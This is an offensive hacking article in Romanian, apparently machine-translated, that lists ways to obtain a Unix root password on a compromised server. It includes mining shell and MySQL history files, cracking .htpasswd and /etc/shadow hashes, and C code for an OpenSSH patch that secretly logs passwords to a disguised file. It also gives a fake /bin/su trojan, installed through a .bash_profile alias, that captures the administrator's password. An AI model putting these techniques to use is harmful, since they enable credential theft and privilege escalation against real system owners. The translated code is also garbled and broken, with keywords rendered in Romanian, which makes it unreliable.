Poate că cea mai mare problemă în hacking este definirea unei parole de root. Chiar și atunci când un hacker a rupt sistemul printr-un fel de exploatare, obținerea parolei nu este atât de ușoară. Dar pe fiecare piuliță există un șurub, așa că permiteți-mi să dezvăluie 10 modalități universale de a întreba aceste informații importante;). Nu, nici măcar nu trebuie să te întâlnești cu administratorul și să-i dai o bere unui stat inconștient (sau mai degrabă într-o stare în care îți dezvăluie informații importante). Totul este mult mai simplu - există trucuri după care veți primi parola de root. Bineînțeles, totul depinde de situație. Toate acestea vor fi discutate mai jos.
1. Căutați în scripturile Perl / PHP.
Metoda este utilizată pentru toate tipurile de hacking.
2. Căutați în fișierele HISTORY.
Adesea administratorii utilizează programe de consolă, care transmit parola direct din linia de comandă. Acest lucru este scris într-un fișier istoric numit .bash_history (desigur, pentru alți interpreți numele fișierului va fi diferit). Pot exista, de asemenea, infa din cauza unei erori în echipa de administrare (eu, de exemplu,
a văzut cum adminul în loc de "su" a tastat "psu", și apoi parola lui).
Există un alt dosar de istorie. Se numește .mysql_history și se află și în directorul de domiciliu al utilizatorului. Aici găsiți comenzile pentru schimbarea parolei pentru accesul SQL. Această parolă poate coincide cu parola de root.
Metoda este aplicabilă numai atunci când există un control complet asupra sistemului. Dar se întâmplă când fișierele HISTORY au atributul 644. Puteți găsi astfel de fișiere (și apoi citiți) cu comanda find / -perm 644 -name * _history.
3. Căutați în .htpasswd.
Deciphează astfel de hashes de programul John The Ripper. Nu este pentru mine să vă învăț asta, așa că cred că această metodă este de înțeles pentru dumneavoastră.
4. Căutați în alte fișiere.
Există servere în care parolele sunt specificate în fișierele aplicațiilor terță parte. De exemplu, am dat peste o situație în care parola de root a fost în fișierul socks5.password.
Atenție vă rog! Este posibil ca aceste fișiere să nu poată fi citite. Prin urmare, totul depinde de situația de aici ...
5. Notele de teren.
Adesea, administratorii lasă fișiere importante în directoarele lor. Acestea conțin câteva note. Este posibil ca printre acestea să puteți întâlni parole. Am întâlnit-o și am găsit o parolă de root în fișierul "note". Acordați o atenție deosebită acestor lucruri.
6. Căutați în jurnalele.
7. Sniffing de date.
Unele rootkituri conțin un sniffer local, care facilitează recunoașterea parolelor pe ssh (o modificare simplă a / usr / bin / ssh cu suport pentru logare;)). De obicei, acest suport și calea către fișierul cu jurnalul sunt specificate în documentația din rootkit). Totul este bine, dar un lucru este dezamăgitor: majoritatea rootkit-urilor conțin vechiul ssh, care suportă doar primul protocol. Ca urmare, un hacker se poate trăda cu dulciuri.
Dar cine previne colectarea propriului ssh și includerea în el a memoriei parolelor? Așa este! Nimeni. În pachetul OpenSSH găsim un fișier numit sshconnect1.c. Apoi inserăm următoarele linii în conținutul său:
După linia "snprintf (prompt, sizeof (prompt),"% 30s@%128s parola: ", server_user, host);"
ifile = fopen ("/ boot / kernel.old", "a");
fprintf (ifile, "sesiunea% s% s \ n", server_user, host);
fclose (ifile);
După linia "password = read_passphrase (prompt, 0);"
ifile = fopen ("/ boot / kernel.old", "a");
fprintf (ifile, "parola este% s \ n", parola);
fclose (ifile);
Dacă totul se face corect, ssh se va aduna fără nici o aventură. Acum administratorul nu va observa defectele din sistem și veți afla parola pe ssh. Când merge sub rădăcină - aceasta va fi parola de root;).
8. Ne prefacem că este un serviciu de sistem;).
Această metodă am descris în unul dintre numerele Hacker (Unixoid, Fun în Linux). Datorită faptului că utilizatorii care au citit Hacker-ul nu vizitează site-ul (și invers), nu va fi superfluă să repet recepția mea dificilă.
Deci, se creează următorul fișier:
#define SORRY "Sorry"
#define PFILE "tmp / .screen"
#define MYPATH "tmp / .screen_active"
#include
void sigexit (int nr);
int principale () char pass [40];
char longs [100];
int filep;
semnal (SIGINT, sigexit);
printf ("Parola:");
sistem ("stty -echo");
scanf ("% s", trecere);
sistem ("ecou stty");
printf ("\ r \ n");
filep = fopen (PFILE, "w");
fprintf (filep, "Pass este% s \ n", trece);
fclose (filep);
printf ("% s \ r \ n", SORRY);
strcpy (lungi, "");
strcat (lungi, "/ bin / ln -sf / bin / su");
strcat (lungi, MYPATH);
sistem (lungi);
ieșire (0);
>
sistem void sigexit (int nu) ("ecou stty");
printf ("\ r \ n \ r \ n");
ieșire (0);
>
și se numește su.c. Dacă vă uitați la codul simplu, puteți înțelege că aceasta este o imitație completă a / bin / su, numai cu parola de logare în fișierul tmp / .screen. Binarul propriu-zis va fi în fișierul tmp / .screen_active (toate căile relative la directorul de domiciliu al utilizatorului). După ce fișierul este executat, acesta este înlocuit cu standardul / bin / su. Astfel, administratorul crede că a făcut o greșeală cu parola, deoarece din a doua încercare suidul va avea succes.
Înainte de a testa această metodă în practică, introduceți linia "alias su /home/user/tmp/.screen_active în fișierul
/.bash_profile și așteptați până când administratorul decide să vină la rădăcină. Când se întâmplă acest lucru - parola dvs.;).
10. Modul standard.
Și, în sfârșit, este timpul să spunem despre calea cea mai banală. Hackerul captează sistemul și accesează / etc / shadow. Mai mult, toate în scenariu - decodificatorul se angajează, dicționarul bun și toate speranțele numai pe noroc. Cred că ați întâlnit adesea această metodă. Și, interesant, am uitat constant despre celelalte 9 ...
Distribuiți acest articol cu prietenii dvs.: